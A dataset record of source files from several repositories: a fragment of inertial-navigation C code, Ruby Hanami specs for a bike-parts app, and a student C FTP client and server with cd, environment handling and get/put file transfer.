H_MAG[0] = -t31*(t20*(magZ*t16+magY*t18)+t25*t27*(magY*t8+magZ*t10));
H_MAG[1] = t31*(t20*(magX*t18+magZ*t22)+t25*t27*(magX*t8-magZ*t11));
H_MAG[2] = t31*(t20*(magX*t16-magY*t22)+t25*t27*(magX*t10+magY*t11));
H_MAG[19] = t31*(t20*t22-t11*t25*t27);
H_MAG[20] = t31*(t16*t20+t10*t25*t27);
H_MAG[21] = -t31*(t18*t20+t8*t25*t27);
|
52d49d7294bbd9b1212eef4f2f40f0757ddfda84
|
[
"C"
] | 1
|
C
|
Yvaine/InertialNav
|
e657e3d83e5da1fa6c95daa4e849a74d3baee683
|
2934d51a043e57ebec539f328ff6e0f6c7c961bd
|
refs/heads/master
|
<file_sep>require 'features_helper'
RSpec.describe 'Edit a bike part' do
let(:repositories) do
{
bikes: BikeRepository.new,
part_types: PartTypeRepository.new,
parts: PartRepository.new
}
end
before do
repositories.each(&:clear)
@bike = repositories[:bikes].create(name: 'Bike name')
@rear_tire_type = repositories[:part_types].create(name: 'Rear tire')
@front_tire_type = repositories[:part_types].create(name: 'Front tire')
@part = repositories[:bikes].add_part(@bike, name: 'Part name', type_id: @rear_tire_type.id)
end
it 'can edit an existent bike part' do
visit "/bikes/#{@bike.id}/parts/#{@part.id}/edit"
within 'form#part-form' do
fill_in 'Name', with: '<NAME>'
select @front_tire_type.name, from: 'Type id'
click_button 'Update'
end
expect(current_path).to eq("/bikes/#{@bike.id}/parts")
expect(page).to_not have_content('Part name')
expect(page).to have_content('New name')
end
end
<file_sep>require 'features_helper'
RSpec.describe 'Add a bike part' do
let(:repositories) do
{
bikes: BikeRepository.new,
part_types: PartTypeRepository.new,
parts: PartRepository.new
}
end
before do
repositories.each(&:clear)
@bike = repositories[:bikes].create(name: 'Bike name')
@part_type = repositories[:part_types].create(name: 'Front tire')
end
it 'can create a new bike part' do
visit "/bikes/#{@bike.id}/parts/new"
within 'form#part-form' do
fill_in 'Name', with: 'New bike part'
select 'Front tire', from: 'Type id'
click_button 'Create'
end
expect(current_path).to eq("/bikes/#{@bike.id}/parts")
expect(page).to have_content('New bike part')
end
end
<file_sep>require 'features_helper'
RSpec.describe 'Edit a bike' do
let(:repository) { BikeRepository.new }
before do
repository.clear
@bike = repository.create(name: 'name #1')
end
it 'can edit an existent bike' do
visit "/bikes/#{@bike.id}/edit"
within 'form#bike-form' do
fill_in 'Name', with: '<NAME>'
select 'Road Bike', from: 'Type'
click_button 'Update'
end
expect(current_path).to eq('/bikes')
expect(page).to_not have_content('name #1')
expect(page).to have_content('New name')
end
end
<file_sep>require 'features_helper'
describe 'List bike parts' do
let(:repositories) do
{
bikes: BikeRepository.new,
part_types: PartTypeRepository.new,
parts: PartRepository.new
}
end
before do
repositories.each(&:clear)
@bike = repositories[:bikes].create(name: 'Bike name')
@rear_tire_type = repositories[:part_types].create(name: 'Rear tire')
@front_tire_type = repositories[:part_types].create(name: 'Front tire')
end
it 'shows message when does not exist bike parts' do
visit "/bikes/#{@bike.id}/parts"
expect(page).to have_content("There aren't parts yet")
end
it 'shows all bikes on page' do
repositories[:bikes].add_part(@bike, name: 'Part name #1', type_id: @rear_tire_type.id)
repositories[:bikes].add_part(@bike, name: 'Part name #2', type_id: @front_tire_type.id)
visit "/bikes/#{@bike.id}/parts"
within '#parts' do
expect(page).to have_css('.part', count: 2)
expect(page).to have_content('Part name #1')
expect(page).to have_content('Part name #2')
end
end
end
<file_sep>require 'features_helper'
describe 'List bikes' do
let(:repository) { BikeRepository.new }
before do
repository.clear
end
it 'shows message when does not exist bikes' do
visit '/bikes'
expect(page).to have_content("There aren't bikes yet")
end
it 'shows all bikes on page' do
repository.create(name: 'name #1')
repository.create(name: 'name #2')
visit '/bikes'
within '#bikes' do
expect(page).to have_css('.bike', count: 2)
end
end
end
<file_sep>require 'features_helper'
RSpec.describe 'Add a bike' do
after do
BikeRepository.new.clear
end
it 'can create a new bike' do
visit '/bikes/new'
within 'form#bike-form' do
fill_in 'Name', with: '<NAME>'
select 'Road Bike', from: 'Type'
click_button 'Create'
end
expect(current_path).to eq('/bikes')
expect(page).to have_content('New bike')
end
end
<file_sep>class UserRepository < Hanami::Repository
def find_by_provider_and_uid(provider, uid)
users.where(provider: provider, uid: uid).first
end
end
<file_sep>RSpec.describe UserRepository do
it '#find_by_provider_and_uid'
end
<file_sep>RSpec.describe BikeRepository do
context 'associations' do
it 'parts'
end
it '#add_part'
end
|
31551dfc93f575e2b39a52f1708cf3d2a1340e63
|
[
"Ruby"
] | 9
|
Ruby
|
pazjacket/vyper-_-upkeep
|
c0d3b8d9dfd4812b23a004211879481cf3eb2203
|
e61571dd6e0f78e9e6a26e2683067a2dbd1bdba4
|
refs/heads/main
|
<repo_name>Jay-Sharma18/HackerRank-Problem-Solving-Algorithm-Lisa-s-WorkBook<file_sep>/README.md
# HackerRank-Problem-Solving-Algorithm-Lisa-s-WorkBook
Find special problems in the book(special problems are problems in each chapter that have the same no. as the page they are on))
<file_sep>/LisasWorkBook.java
package JavaAlgorithms;
import java.io.*;
import java.math.*;
import java.security.*;
import java.text.*;
import java.util.*;
import java.util.concurrent.*;
import java.util.regex.*;
public class LisasWorkBook {
// Complete the workbook function below.
static int workbook(int n, int k, int[] arr) {
//variable to hold current Page number as we move through page by page.
//This variable will be used for comparison with question number to find special //questions
int currentPage=0;
//variable to hold count of special questions
int count=0;
//run the loop for each chapter
for(int i=0;i<n;i++)
{
//if questions in a chapter are less than or equal to questions allowed on a
//page, increment page number and run a loop from 1 to questions in the //chapter and icrement counter when a special question is encountered
if(arr[i]<=k)
{
currentPage++;
for(int j=1;j<=arr[i];j++)
{
if(j==currentPage)
{
count++;
}
}
}
//if questions in a chapter are greater than questions allowed on a page,
//increment current page each time the number of questions in the chapter //exceeds questions allowed on the page and check for special questions. Do //not increment current page if the last question falls on it
else
{
currentPage+=1;
int temp=0;
for(int j=1;j<=arr[i];j++)
{
temp++;
if(j==currentPage) count++;
if(temp==k && j!=arr[i])
{
currentPage+=1;
temp=0;
}
}
}
}
return count;
}
private static final Scanner scanner = new Scanner(System.in);
public static void main(String[] args) throws IOException {
BufferedWriter bufferedWriter = new BufferedWriter(new FileWriter("C:\\Users\\Jay\\Desktop\\Selenium,Drivers and Cucumber\\test.txt"));
String[] nk = scanner.nextLine().split(" ");
int n = Integer.parseInt(nk[0]);
int k = Integer.parseInt(nk[1]);
int[] arr = new int[n];
String[] arrItems = scanner.nextLine().split(" ");
scanner.skip("(\r\n|[\n\r\u2028\u2029\u0085])?");
for (int i = 0; i < n; i++) {
int arrItem = Integer.parseInt(arrItems[i]);
arr[i] = arrItem;
}
int result = workbook(n, k, arr);
bufferedWriter.write(String.valueOf(result));
bufferedWriter.newLine();
bufferedWriter.close();
scanner.close();
}
}
|
ac0f6bb02836de733747b91db1229cb4df2aa11d
|
[
"Markdown",
"Java"
] | 2
|
Markdown
|
Jay-Sharma18/HackerRank-Problem-Solving-Algorithm-Lisa-s-WorkBook
|
575b73d2407e1366dc5dfc43bab55fe63dbad3da
|
4224803fcd9dc5c6c46b282438e8432b3ddec751
|
refs/heads/master
|
<repo_name>Lumpouille/FTP<file_sep>/src/features_cd.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* features_cd.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/03/18 18:22:15 by mceccato #+# #+# */
/* Updated: 2015/03/30 17:50:56 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
char **ft_pwd(char *cwd, char **envy)
{
int i;
char *s;
char *tmp;
i = 0;
while (envy[i] != NULL)
{
if ((ft_strncmp(envy[i], "PWD", 3)) == 0)
{
s = ft_strjoin("PWD=", cwd);
free(envy[i]);
envy[i] = ft_strdup(s);
free(s);
return (envy);
}
i++;
}
tmp = ft_strjoin("PWD=", cwd);
envy = ft_set_env(envy, tmp);
free(tmp);
return (envy);
}
char **ft_oldpwd(char *cwd, char **envy)
{
int i;
char *s;
char *tmp;
i = 0;
while (envy[i] != NULL)
{
if ((ft_strncmp(envy[i], "OLDPWD", 6)) == 0)
{
s = ft_strjoin("OLDPWD=", cwd);
free(envy[i]);
envy[i] = ft_strdup(s);
free(s);
return (envy);
}
i++;
}
tmp = ft_strjoin("OLDPWD=", cwd);
envy = ft_set_env(envy, tmp);
free(tmp);
return (envy);
}
char *ft_get_home(char **envy)
{
char *s;
char **tmp;
int i;
i = 0;
while (envy[i] != NULL)
{
if (ft_strncmp(envy[i], "HOME=", 5) == 0)
{
tmp = ft_strsplit(envy[i], '=');
s = ft_strdup(tmp[1]);
free_arr2d(tmp);
return (s);
}
i++;
}
return (NULL);
}
char *ft_cd_oldpwd(char **envy)
{
char *s;
int i;
i = 0;
while (envy[i] != NULL)
{
if ((ft_strncmp(envy[i], "OLDPWD=", 7)) == 0)
{
s = ft_strsub(envy[i], 7, ft_strlen(envy[i]) - 7);
return (s);
}
i++;
}
return (NULL);
}
void ft_error_cd(char *s, char *dir)
{
struct stat sb;
if (lstat(dir, &sb) == -1)
{
ft_putstr("cd: no such file or directory: ");
(dir) ? ft_putendl(dir) : ft_putendl(s);
return ;
}
else
{
if (sb.st_mode & S_IFDIR)
{
if (S_IXUSR)
{
ft_putstr("cd: permission denied: ");
ft_putendl(dir);
return ;
}
}
ft_putstr("cd: not a directory: ");
ft_putendl(dir);
return ;
}
}
<file_sep>/src/serveur.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* serveur.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/05/08 16:47:27 by mceccato #+# #+# */
/* Updated: 2015/07/01 18:50:58 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
void end_client(int save, t_server *serv)
{
dup2(save, 1);
close(save);
if (serv->ret == 0)
ft_putendl("Client disconnected.");
else if (serv->ret == -1)
ft_putendl("Error, recv failed.");
}
void state(t_server *serv)
{
char buff[3001];
ft_bzero(buff, 3001);
if (serv->state == KO)
{
send(serv->cs, ERROR, ft_strlen(ERROR) + 1, 0);
recv(serv->cs, buff, 300, 0);
}
else if (serv->state == OK)
{
send(serv->cs, SUCCESS, ft_strlen(SUCCESS) + 1, 0);
recv(serv->cs, buff, 300, 0);
}
}
void new_client(t_server *serv)
{
pid_t pid;
char buff[3001];
int save;
save = dup(1);
if ((pid = fork()) == 0)
{
ft_bzero(buff, 3001);
while ((serv->ret = read(serv->cs, buff, 3000)) > 0)
{
serv->state = KO;
dup2(serv->cs, 1);
dup2(serv->cs, 2);
buff[serv->ret - 1] = '\0';
change_tab(buff);
serv->split_line = ft_strsplit(buff, ' ');
read_commands(serv);
state(serv);
ft_bzero(buff, 3001);
}
end_client(save, serv);
close(serv->cs);
}
}
char **get_env(char **env)
{
char **arr;
int i;
int j;
i = 0;
j = 0;
while (env[i] != NULL)
i++;
if (!(arr = (char**)malloc(sizeof(char*) * (i + 1))))
return (NULL);
while (j < i)
{
arr[j] = ft_strdup(env[j]);
j++;
}
arr[j] = NULL;
return (arr);
}
int main(int ac, char **av, char **env)
{
t_server serv;
if (ac != 2)
usage(av[0]);
serv.envy = get_env(env);
serv.port = ft_atoi(av[1]);
serv.sock = create_server(serv.port);
while ((serv.cs = accept(serv.sock,
(struct sockaddr*)&serv.csin, &serv.cslen)) > 0)
{
ft_putendl("Client connected.");
new_client(&serv);
}
close(serv.sock);
return (0);
}
<file_sep>/libft/Makefile
# **************************************************************************** #
# #
# ::: :::::::: #
# Makefile :+: :+: :+: #
# +:+ +:+ +:+ #
# By: mceccato <<EMAIL>> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2014/11/13 18:50:34 by mceccato #+# #+# #
# Updated: 2015/01/30 18:32:52 by mceccato ### ########.fr #
# #
# **************************************************************************** #
NAME = libft.a
SRC = ft_bzero.c ft_memset.c ft_memcpy.c ft_memccpy.c ft_memmove.c \
ft_memchr.c ft_memcmp.c ft_memalloc.c ft_memdel.c \
ft_strnew.c ft_strdel.c ft_strclr.c ft_atoi.c \
ft_strdup.c ft_strlen.c ft_strcpy.c ft_strncpy.c \
ft_strcat.c ft_strncat.c ft_strlcat.c ft_strchr.c \
ft_strrchr.c ft_strstr.c ft_strncmp.c ft_strnstr.c \
ft_strcmp.c ft_strjoin.c ft_putendl_fd.c ft_itoa.c \
ft_strtrim.c ft_striter.c ft_strmap.c ft_strsplit.c \
ft_striteri.c ft_strmapi.c ft_strequ.c ft_strnequ.c \
ft_strsub.c ft_tolower.c ft_toupper.c ft_isprint.c \
ft_isascii.c ft_isdigit.c ft_isalnum.c ft_isalpha.c \
ft_putchar.c ft_putchar_fd.c ft_putstr.c \
ft_putstr_fd.c ft_putnbr.c ft_putnbr_fd.c ft_putendl.c \
ft_putendl_fd.c ft_lstnew.c ft_lstdelone.c ft_lstdel.c \
ft_lstadd.c ft_lstiter.c ft_lstmap.c ft_lstpush.c ft_isspace.c \
ft_strclen.c ft_strpure.c ft_swap.c
OBJ = $(SRC:.c=.o)
CC = gcc
CCFLAGS = -Wall -Werror -Wextra
all: $(NAME)
$(NAME): $(OBJ)
@ar rc $(NAME) $^
@ranlib $(NAME)
%.o: %.c
@$(CC) $(CCFLAGS) -o $@ -c $< -I includes
clean:
@/bin/rm -f $(OBJ)
fclean: clean
@/bin/rm -f $(NAME)
re: fclean all
.PHONY: all clean fclean re
<file_sep>/Makefile
# **************************************************************************** #
# #
# ::: :::::::: #
# Makefile :+: :+: :+: #
# +:+ +:+ +:+ #
# By: mceccato <<EMAIL>> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2015/05/08 16:46:50 by mceccato #+# #+# #
# Updated: 2015/07/02 16:05:05 by mceccato ### ########.fr #
# #
# **************************************************************************** #
SRC_CLIENT = src/client.c \
src/client_suite.c \
src/put_file.c
OBJS_CLIENT = $(SRC_CLIENT:.c=.o)
SRC_SERV = src/serveur.c \
src/serveur_suite.c \
src/exec.c \
src/cd.c \
src/features_cd.c \
src/set_env.c \
src/unset_env.c \
src/transfer.c
OBJS_SERV = $(SRC_SERV:.c=.o)
CC = clang
CCFLAGS = -Wall -Wextra -Werror
INC = -I libft/ -I inc
LIB = -L libft -lft
all: serveur client
libft/libft.a:
make -C libft/
serveur: libft/libft.a $(OBJS_SERV)
@$(CC) $(CCFLAGS) $(OBJS_SERV) -o $@ $(INC) $(LIB)
client: libft/libft.a $(OBJS_CLIENT)
@$(CC) $(CCFLAGS) $(OBJS_CLIENT) -o $@ $(INC) $(LIB)
%.o: %.c
$(CC) $(CCFLAGS) $(INC) -c $< -o $@
clean:
/bin/rm -f $(OBJS_SERV)
/bin/rm -f $(OBJS_CLIENT)
make -C libft clean
fclean: clean
/bin/rm -f serveur
/bin/rm -f client
make -C libft fclean
re: fclean all
.PHONY: all clean fclean re serveur client libft/libft.a
<file_sep>/src/unset_env.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* unset_env.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/03/30 20:44:26 by mceccato #+# #+# */
/* Updated: 2015/03/31 10:06:43 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
char **ft_unset(char **new, char **envy, char *line)
{
int i;
int k;
char *tmp;
i = 0;
k = 0;
while (envy[i] != NULL)
{
tmp = ft_strsub(envy[i], 0, ft_strclen(envy[i], '='));
if ((ft_strcmp(line, tmp)) == 0)
i++;
else
{
new[k] = ft_strdup(envy[i]);
k++;
i++;
}
free(tmp);
tmp = NULL;
}
new[k] = NULL;
free_arr2d(envy);
return (new);
}
char **ft_unset_env(char **envy, char *line)
{
int i;
int ret;
char *tmp;
char **new;
ret = -1;
i = 0;
if (!line)
return (envy);
while (envy[i] != NULL)
{
tmp = ft_strsub(envy[i], 0, ft_strclen(envy[i], '='));
if ((ft_strcmp(line, tmp)) == 0)
ret = 0;
i++;
free(tmp);
tmp = NULL;
}
if (ret != 0)
return (envy);
if (!(new = (char**)malloc(sizeof(char*) * i)))
exit(EXIT_FAILURE);
new = ft_unset(new, envy, line);
return (new);
}
<file_sep>/src/put_file.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* put_file.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/06/30 23:42:38 by mceccato #+# #+# */
/* Updated: 2015/07/01 16:15:00 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
/*
** envoi du fichier -------- CLIENT -----------
*/
void send_file(t_client *client, int fd)
{
char file[3000];
char rec[3000];
while ((client->ret = read(fd, file, 3000)) > 0)
{
recv(client->sock, rec, 3000, 0);
send (client->sock, ft_itoa(client->ret), 4, 0);
if (client->ret != 0)
{
recv(client->sock, rec, 3000, 0);
send(client->sock, file, client->ret, 0);
ft_bzero(file, 3000);
}
}
recv(client->sock, rec, 3000, 0);
send (client->sock, ft_itoa(client->ret), 4, 0);
}
void send_back(t_client *client)
{
int fd;
char buf[3000];
recv(client->sock, buf, 3000, 0);
if (!client->split_line[1])
{
send(client->sock, "ko", 2, 0);
ft_putendl("Usage: put <file>");
return ;
}
if ((fd = open(client->split_line[1], O_RDONLY)) == -1)
{
send(client->sock, "ko", 2, 0);
ft_putendl("File not found");
close(fd);
return ;
}
send(client->sock, "ok", 2, 0);
send_file(client, fd);
close(fd);
}
void my_put(t_client client)
{
char reply[30001];
send(client.sock, "put", 3, 0);
send_back(&client);
recv(client.sock, reply, 30000, 0);
send(client.sock, "ty", 2, 0);
ft_putstr(reply);
}
<file_sep>/src/client_suite.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* client_suite.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/07/01 16:07:05 by mceccato #+# #+# */
/* Updated: 2015/07/01 16:08:24 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
void kill_process(int i)
{
kill(SIGINT, i);
}
void usage(char *s)
{
ft_putstr("Usage: ");
ft_putstr(s);
ft_putstr(" <addr>");
ft_putendl(" <port>");
exit(KO);
}
int create_client(char *addr, int port)
{
int sock;
struct protoent *proto;
struct sockaddr_in sin;
proto = getprotobyname("tcp");
if (proto == 0)
return (KO);
sock = socket(PF_INET, SOCK_STREAM, proto->p_proto);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(addr);
if (connect(sock, (const struct sockaddr *)&sin, sizeof(sin)) == -1)
{
ft_putendl_fd("Connect error", 2);
exit(KO);
}
ft_putstr("Connected on : ");
ft_putendl(addr);
return (sock);
}
void change_tab(char *line)
{
int i;
i = 0;
while (line[i] != '\0')
{
if (line[i] == '\t' || line[i] == '\n')
line[i] = ' ';
i++;
}
}
void free_arr2d(char **arr)
{
int i;
i = -1;
while (arr[++i] != NULL)
{
free(arr[i]);
arr[i] = NULL;
}
free(arr);
arr = NULL;
}
<file_sep>/src/cd.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* cd.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/06/11 16:05:03 by mceccato #+# #+# */
/* Updated: 2015/06/11 16:05:05 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
char **ft_end_cd(char *dir, char *s, char *cwd, char **envy)
{
int chret;
char *tmp;
if ((chret = chdir(s) == -1))
{
if (dir && dir[0] == '~')
ft_error_cd(dir, s);
else
ft_error_cd(dir, s);
return (envy);
}
if ((tmp = getcwd(NULL, 0)) == NULL)
return (envy);
envy = ft_oldpwd(cwd, envy);
envy = ft_pwd(tmp, envy);
free(tmp);
free(cwd);
tmp = NULL;
free(s);
s = NULL;
return (envy);
}
char *ft_no_dir(char **envy)
{
char *s;
if ((s = ft_get_home(envy)) == NULL)
{
ft_putendl_fd("ft_minishell1: cd: HOME not set", 2);
return (NULL);
}
return (s);
}
char *ft_cd_home(char *dir, char **envy)
{
char *tmp;
char *s;
if ((tmp = ft_get_home(envy)) == NULL)
return (NULL);
if (dir[1] == '\0')
s = ft_strdup(tmp);
else
s = ft_strjoin(tmp, ft_strsub(dir, 1, ft_strlen(dir) - 1));
return (s);
}
char *ft_else(char *cwd, char *dir, char **envy)
{
char *s;
char *tmp;
tmp = NULL;
if (dir[0] == '-')
s = ft_cd_oldpwd(envy);
else
{
tmp = ft_strjoin(cwd, "/");
s = ft_strjoin(tmp, dir);
free(tmp);
tmp = NULL;
}
return (s);
}
char **ft_cd(char *dir, char **envy)
{
char *s;
char *cwd;
if ((cwd = getcwd(NULL, 0)) == NULL)
return (envy);
if (!dir)
{
if ((s = ft_no_dir(envy)) == NULL)
return (envy);
}
else if (dir[0] == '~')
{
if ((s = ft_cd_home(dir, envy)) == NULL)
return (envy);
}
else if (dir[0] == '/')
s = ft_strdup(dir);
else
{
if ((s = ft_else(cwd, dir, envy)) == NULL)
return (envy);
}
envy = ft_end_cd(dir, s, cwd, envy);
return (envy);
}
<file_sep>/inc/ftp.h
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ftp.h :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/05/08 16:47:51 by mceccato #+# #+# */
/* Updated: 2015/07/01 18:52:45 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#ifndef FTP_H
# define FTP_H
# include <unistd.h>
# include <fcntl.h>
# include <stdlib.h>
# include <sys/socket.h>
# include <netinet/in.h>
# include <arpa/inet.h>
# include <netdb.h>
# include <stdio.h>
# include <signal.h>
# include <sys/stat.h>
# include "libft.h"
# define KO -1
# define OK 1
# define PROMPT "\033[34;1mft_p > \033[0m"
# define WELCOME "\033[34;1;4mWelcome on this server !\033[0m\n"
# define ERROR "\033[31mERROR\n\n\033[0m"
# define SUCCESS "\033[32mSUCCESS\n\n\033[0m"
typedef struct s_server
{
int port;
int sock;
int ret;
int cs;
int state;
unsigned int cslen;
struct sockaddr_in csin;
char buff[3000];
char *line;
char **split_line;
char **envy;
} t_server;
typedef struct s_client
{
int port;
int sock;
int ret;
int rbyte;
int sock_len;
char buff[3000];
char *error;
char *line;
char **split_line;
} t_client;
/*
** serveur.c
*/
void free_arr2d(char**arr);
/*
** exec.c
*/
void exec_ls(t_server *serv);
void exec_pwd(t_server *serv);
/*
** cd.c
*/
char **ft_cd(char *dir, char **envy);
/*
** features_cd.c
*/
char **ft_pwd(char *cwd, char **envy);
char **ft_oldpwd(char *cwd, char **envy);
char *ft_cd_oldpwd(char **envy);
char *ft_get_home(char **envy);
void ft_error_cd(char *s, char *dir);
/*
** set_env.c
*/
char **ft_set_env(char **envy, char *line);
/*
** unset_env.c
*/
char **ft_unset_env(char **envy, char *line);
/*
** transfer.c
*/
void ft_get(t_server *serv);
void ft_put(t_server *serv);
/*
** put_file.c
*/
void send_back(t_client *client);
void my_put(t_client client);
/*
** client_suite.c
*/
void kill_process(int i);
void usage(char *s);
int create_client(char *addre, int port);
void change_tab(char *line);
void free_arr2d(char **arr);
/*
** serveur_suite.c
*/
void free_arr2d(char **arr);
void usage(char *s);
int create_server(int port);
void change_tab(char *line);
void read_commands(t_server *serv);
#endif
<file_sep>/src/client.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* client.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/05/08 17:52:08 by mceccato #+# #+# */
/* Updated: 2015/07/01 16:08:41 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
void write_file(int fd, int size, char *reply)
{
int i;
i = 0;
while (i < size)
{
write(fd, &reply[i], 1);
i++;
}
}
void get_back(int sock, char *name)
{
int fd;
char reply[3001];
int size;
fd = open(name, O_CREAT | O_WRONLY, S_IRWXU | S_IRWXG | S_IRWXO);
while (42)
{
ft_bzero(reply, 3000);
recv(sock, reply, 3000, 0);
size = ft_atoi(reply);
send(sock, "size", 4, 0);
if (size == 0)
{
recv(sock, reply, 3000, 0);
ft_putstr(reply);
send(sock, "end get", 7, 0);
close(fd);
return ;
}
ft_bzero(reply, 3000);
recv(sock, reply, 3000, 0);
send(sock, "file", 4, 0);
write_file(fd, size, reply);
}
}
void reading_back(t_client client)
{
char reply[30001];
while (42)
{
ft_bzero(reply, 30001);
recv(client.sock, reply, 30000, 0);
if (ft_strcmp(reply, "get") == 0)
{
send(client.sock, "get", 3, 0);
get_back(client.sock, client.split_line[1]);
return ;
}
else if (ft_strcmp(reply, "put") == 0)
{
my_put(client);
return ;
}
ft_putstr(reply);
if (ft_strstr(reply, ERROR) != NULL ||
ft_strstr(reply, SUCCESS) != NULL)
{
send(client.sock, "ty", 2, 0);
return ;
}
}
}
void boucle(t_client client)
{
int ret;
char buff[3001];
while (42)
{
ft_putstr(PROMPT);
ft_bzero(buff, 3001);
ret = read(0, buff, 3000);
buff[ret] = '\0';
if (ft_strcmp(buff, "quit\n") == 0)
{
close(client.sock);
ft_putendl("Disconnected.");
exit(OK);
}
change_tab(buff);
client.split_line = ft_strsplit(buff, ' ');
if (client.split_line[0] == NULL)
return ;
send(client.sock, buff, ft_strlen(buff), 0);
reading_back(client);
}
}
int main(int ac, char **av)
{
t_client client;
if (ac != 3)
usage(av[0]);
client.port = ft_atoi(av[2]);
client.sock = create_client(av[1], client.port);
signal(2, kill_process);
while (42)
boucle(client);
close(client.sock);
return (0);
}
<file_sep>/src/transfer.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* transfer.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/06/30 23:46:58 by mceccato #+# #+# */
/* Updated: 2015/06/30 23:49:35 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
/*
** reception du fichier ------- SERVEUR ----------
*/
void write_file(int fd, int size, char *reply)
{
int i;
i = 0;
while (i < size)
{
write(fd, &reply[i], 1);
i++;
}
}
void lecture(t_server *serv)
{
int fd;
char reply[3001];
int size;
fd = open(serv->split_line[1], O_CREAT | O_WRONLY,
S_IRWXU | S_IRWXG | S_IRWXO);
while (42)
{
ft_bzero(reply, 3000);
send(serv->cs, "size", 4, 0);
recv(serv->cs, reply, 3000, 0);
size = ft_atoi(reply);
if (size == 0)
{
close(fd);
return ;
}
ft_bzero(reply, 3000);
send(serv->cs, "file", 4, 0);
recv(serv->cs, reply, 3000, 0);
write_file(fd, size, reply);
}
}
void ft_put(t_server *serv)
{
char buf[3000];
ft_bzero(buf, 3000);
send(serv->cs, "put", 3, 0);
recv(serv->cs, buf, 3000, 0);
ft_bzero(buf, 3000);
send(serv->cs, "state", 5, 0);
recv(serv->cs, buf, 3000, 0);
if (ft_strcmp(buf, "ko") == 0)
{
serv->state = KO;
return ;
}
else
{
serv->state = OK;
lecture(serv);
}
}
void send_file(t_server *serv, int fd)
{
char file[3000];
char rec[3000];
serv->state = OK;
send(serv->cs, "get", 6, 0);
recv(serv->cs, rec, 3000, 0);
while ((serv->ret = read(fd, file, 3000)) > 0)
{
send (serv->cs, ft_itoa(serv->ret), 4, 0);
recv(serv->cs, rec, 3000, 0);
if (serv->ret != 0)
{
send(serv->cs, file, serv->ret, 0);
recv(serv->cs, rec, 3000, 0);
ft_bzero(file, 3000);
}
}
send(serv->cs, "end get", 7, 0);
recv(serv->cs, rec, 3000, 0);
}
void ft_get(t_server *serv)
{
int fd;
if (!serv->split_line[1])
{
ft_putendl("Usage: get <file>");
return ;
}
if ((fd = open(serv->split_line[1], O_RDONLY)) == -1)
{
ft_putendl("File not found");
close(fd);
return ;
}
send_file(serv, fd);
close(fd);
}
<file_sep>/src/serveur_suite.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* serveur_suite.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/07/01 18:50:05 by mceccato #+# #+# */
/* Updated: 2015/07/01 18:51:01 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
void free_arr2d(char **arr)
{
int i;
i = 0;
if (!arr)
return ;
while (arr[i] != NULL)
{
free(arr[i]);
arr[i] = NULL;
i++;
}
free(arr);
arr = NULL;
}
void usage(char *s)
{
ft_putstr("Usage: ");
ft_putstr(s);
ft_putendl(" <port>");
exit(KO);
}
int create_server(int port)
{
int sock;
struct protoent *proto;
struct sockaddr_in sin;
proto = getprotobyname("tcp");
if (proto == 0)
return (KO);
sock = socket(PF_INET, SOCK_STREAM, proto->p_proto);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(sock, (const struct sockaddr *)&sin, sizeof(sin)) == -1)
{
ft_putendl_fd("Bind error", 2);
exit(KO);
}
listen(sock, 42);
return (sock);
}
void change_tab(char *line)
{
int i;
i = 0;
while (line[i] != '\0')
{
if (line[i] == '\t' || line[i] == '\n')
